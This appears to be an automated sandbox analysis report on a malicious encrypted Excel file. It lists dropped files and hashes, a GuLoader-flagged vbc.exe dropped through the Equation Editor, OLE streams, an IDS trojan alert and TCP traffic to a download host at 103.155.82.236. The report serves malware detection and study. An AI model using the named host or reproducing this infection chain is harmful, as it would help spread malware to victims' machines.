                    File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):49744
                    Entropy (8bit):7.99056926749243
                    Encrypted:true
                    SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                    MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                    SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                    SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                    SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                    Malicious:false
                    Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B8598AE.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):79394
                    Entropy (8bit):7.864111100215953
                    Encrypted:false
                    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                    MD5:16925690E9B366EA60B610F517789AF1
                    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                    Malicious:false
                    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B99C14D7.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):51166
                    Entropy (8bit):7.767050944061069
                    Encrypted:false
                    SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                    MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                    SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                    SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                    SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                    Malicious:false
                    Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D467075B.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):84203
                    Entropy (8bit):7.979766688932294
                    Encrypted:false
                    SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                    MD5:208FD40D2F72D9AED77A86A44782E9E2
                    SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                    SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                    SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                    Malicious:false
                    Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DEDF5C96.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):50311
                    Entropy (8bit):7.960958863022709
                    Encrypted:false
                    SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                    MD5:4141C7515CE64FED13BE6D2BA33299AA
                    SHA1:B290F533537A734B7030CE1269AC8C5398754194
                    SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                    SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                    Malicious:false
                    Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F77229A3.emf
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):648132
                    Entropy (8bit):2.8124530118203914
                    Encrypted:false
                    SSDEEP:3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
                    MD5:955A9E08DFD3A0E31C7BCF66F9519FFC
                    SHA1:F677467423105ACF39B76CB366F08152527052B3
                    SHA-256:08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
                    SHA-512:39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
                    Malicious:false
                    Preview: ....l...........................Q>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................V$.....o..f.V.@o.%.....o...o.....L.o...o.RQAXL.o.D.o.......o.0.o.$QAXL.o.D.o. ...Id.VD.o.L.o. ............d.V........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............o.X...D.o.x.o..8.V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                    C:\Users\user\Desktop\~$BL_SGN11203184.xlsx
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):330
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                    Malicious:true
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    C:\Users\Public\vbc.exe
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):147456
                    Entropy (8bit):5.607689655560483
                    Encrypted:false
                    SSDEEP:1536:Fttu3FssKUmvr9DJ1FJS1bQNZ6bp/+Dtr5m3XSt4lYS0eXJWUTFboob:ztu3alxx3fSQmbs55r4l6eXJWUB0ob
                    MD5:99BBF83ABE9D6E4ECC91493E32230833
                    SHA1:B0BD6BA2DC10EB5552EDC7A3460C80EE0EB1B11E
                    SHA-256:2B2A00650DC91D1A7CCFA4A62E3462762C62D8A092BDDB75943F87074F1D56A5
                    SHA-512:0F6B9F9A843F491B925AAB0AF5D4F08024A2D430C41022C23AFB46CE3ABDF7881E8D87AC6D93F5ADFC2F11AEE0F0BB0AC28FA2500EC118BC1ED496281D3AFEC6
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                    Antivirus:
                    • Antivirus: Metadefender, Detection: 31%, Browse
                    • Antivirus: ReversingLabs, Detection: 59%
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......G.....................0............... ....@..........................P......0.......................................$...(....@..P...................................................................(... ....................................text............................... ..`.data...P.... ....... ..............@....rsrc...P....@.......0..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                    Static File Info

                    General

                    File type:CDFV2 Encrypted
                    Entropy (8bit):7.995550090763264
                    TrID:
                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                    File name:BL_SGN11203184.xlsx
                    File size:1317888
                    MD5:06eb9a2b3d7113604968b87722ed242a
                    SHA1:2a6929b76b8b69a4e3a3766881280c63af765cb1
                    SHA256:1554d0f1b36381c9a323749cd62b7870c8273d8020fc81df09cb159a3bb84acc
                    SHA512:1f0f84d1c7bb6da1a66bbe25bd29336e4b1e84af67125ee7da47caf0ef523c9a5bb1df023d9d91c83c03e29b5a5c38784780756368e7f4ee35cd39afbc9b3bf6
                    SSDEEP:24576:BL0fDpdsXTvaIhcjRG0WZQK2Txwjki59qAusGovj/MWNFhb/W+:Bgne7aptGxbIqspsG0rMWNFZO+
                    File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

                    File Icon

                    Icon Hash:e4e2aa8aa4b4bcb4

                    Static OLE Info

                    General

                    Document Type:OLE
                    Number of OLE Files:1

                    OLE File "BL_SGN11203184.xlsx"

                    Indicators

                    Has Summary Info:False
                    Application Name:unknown
                    Encrypted Document:True
                    Contains Word Document Stream:False
                    Contains Workbook/Book Stream:False
                    Contains PowerPoint Document Stream:False
                    Contains Visio Document Stream:False
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:False

                    Streams

                    Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                    General
                    Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                    File Type:data
                    Stream Size:64
                    Entropy:2.73637206947
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                    Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                    Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                    General
                    Stream Path:\x6DataSpaces/DataSpaceMap
                    File Type:data
                    Stream Size:112
                    Entropy:2.7597816111
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                    Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                    Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                    General
                    Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                    File Type:data
                    Stream Size:200
                    Entropy:3.13335930328
                    Base64 Encoded:False
                    Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                    Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                    General
                    Stream Path:\x6DataSpaces/Version
                    File Type:data
                    Stream Size:76
                    Entropy:2.79079600998
                    Base64 Encoded:False
                    Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                    Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                    Stream Path: EncryptedPackage, File Type: data, Stream Size: 1303128
                    General
                    Stream Path:EncryptedPackage
                    File Type:data
                    Stream Size:1303128
                    Entropy:7.99983573817
                    Base64 Encoded:True
                    Data ASCII:E . . . . . . . . . 2 . . . . . . J a . . . . . . . . . . . f . o . M [ . g . M a . . . . . b j l . L . . f . . . . . . . . E . . . . . A . . f . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | .
                    Data Raw:45 e2 13 00 00 00 00 00 91 2e 32 d5 91 ed a7 b7 a9 4a 61 a2 c6 0d 8b b9 d4 eb 2e d9 a5 88 66 e7 6f 15 4d 5b f6 67 94 4d 61 d6 0c 2e f4 83 62 6a 6c 0e 4c 11 08 66 a8 b4 05 cf 1e a7 03 b3 45 1b c2 bd cc e2 41 da a4 66 c5 98 92 ec bf 0e 7c b8 87 7e 39 a1 7b 1d 01 cb c5 98 92 ec bf 0e 7c b8 87 7e 39 a1 7b 1d 01 cb c5 98 92 ec bf 0e 7c b8 87 7e 39 a1 7b 1d 01 cb c5 98 92 ec bf 0e 7c b8
                    Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                    General
                    Stream Path:EncryptionInfo
                    File Type:data
                    Stream Size:224
                    Entropy:4.49728945514
                    Base64 Encoded:False
                    Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . o L . . . k + . . 1 . . . A . . . . . K o N . z ? . . . . . . . . . . . . e r . . S . . K . . . . . . . Q . . * . X 0 E . . e D G z "
                    Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    06/10/21-15:17:32.895609TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916780192.168.2.22103.155.82.236

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jun 10, 2021 15:17:32.645184040 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:32.894922018 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:32.895140886 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:32.895608902 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.146260023 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.146306038 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.146328926 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.146351099 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.146495104 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.395716906 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.395765066 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.395785093 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.395802975 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.395828962 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.395852089 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.395875931 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.395900011 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.395981073 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.397898912 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.645212889 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645260096 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645279884 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645298958 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645324945 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645348072 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645370960 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645394087 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645417929 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645420074 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.645469904 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.645476103 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.645478964 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.646986961 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.647037983 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.647062063 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.647088051 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.647102118 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.647128105 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.647134066 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.647139072 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.647156000 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.647170067 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.647186995 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.648278952 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894490957 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894521952 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894537926 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894556999 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894566059 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894573927 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894601107 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894602060 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894606113 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894608974 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894620895 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894637108 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894646883 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894658089 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894659042 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894675970 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894676924 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894692898 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894692898 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894710064 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894712925 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894725084 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894731045 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894748926 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894748926 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894764900 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894764900 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894782066 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894783020 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894799948 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894804001 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894814014 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894821882 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894829988 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894856930 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896171093 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896209002 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896231890 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896239996 CEST4916780192.168.2.22103.155.82.236
